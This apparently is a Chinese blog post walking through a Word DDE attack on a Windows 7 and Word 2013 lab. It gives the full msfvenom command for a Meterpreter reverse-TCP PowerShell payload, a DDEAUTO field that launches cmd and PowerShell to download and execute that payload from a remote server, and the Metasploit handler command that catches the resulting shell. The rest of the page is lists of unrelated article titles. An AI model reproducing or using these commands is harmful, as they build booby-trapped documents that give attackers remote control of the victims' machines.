环境:

win7 64位,word2013

生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1

放到VPS上,这里我们放到本机搭建的apache环境中

win7中访问木马是否成功

打开word2013,设置域ctrl+F9

写入代码:

DDEAUTO C:\\windows\\system32\\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.37/x.ps1') "

命令通过powershell执行下载了VPS的x.ps1

监听payload

msf5 > handler -H 192.168.64.135 -P 1122 -p windows/x64/meterpreter/reverse_tcp

打开word文件,点击是

在后台弹出cmd

监听成功

最新文章

  1. OutofMemory之PermGen介绍
  2. DNG格式解析
  3. Linux:使用nohup让进程在后台可靠运行
  4. JQuery_表单选择器
  5. PHP面向对象中的重要知识点(三)
  6. [原创]java WEB学习笔记84:Hibernate学习之路-- -映射 一对一关系 ,基外键的方式实现
  7. rpm and yum commands
  8. substring函数——sql
  9. php实现无限级树型菜单(函数递归算法)
  10. @ManyToMany中间表附加字段设计
  11. intel安装mac os
  12. BZOJ 1613: [Usaco2007 Jan]Running贝茜的晨练计划
  13. JVM指令集(指令码、助记符、功能描述)(转)
  14. Angularjs 实现移动端在线测评效果
  15. 深入理解CSS3 Flexbox
  16. 【java】字节码操作技术
  17. C++ 构造与析构的执行顺序
  18. 如何让windows更高效?
  19. Jump Game II leetcode java
  20. 用于Web开发的8 个最好的跨平台编辑器

热门文章

  1. PPT学习总结
  2. VGG Net 论文细读
  3. 案例分享:Qt政务标签设计器,标签排版软件定制与打印
  4. 【网络编程】TCPIP_1_快速入门
  5. CNVD-2021-14536 锐捷 RG-UAC 统一上网行为管理审计系统信息泄露漏洞
  6. 【C语言】浮点型在内存中的存储
  7. 网关服务Kong和konga介绍安装使用教程
  8. NOIP 模拟 7 考试总结
  9. windows上python3安装
  10. UWP App Data存储和获取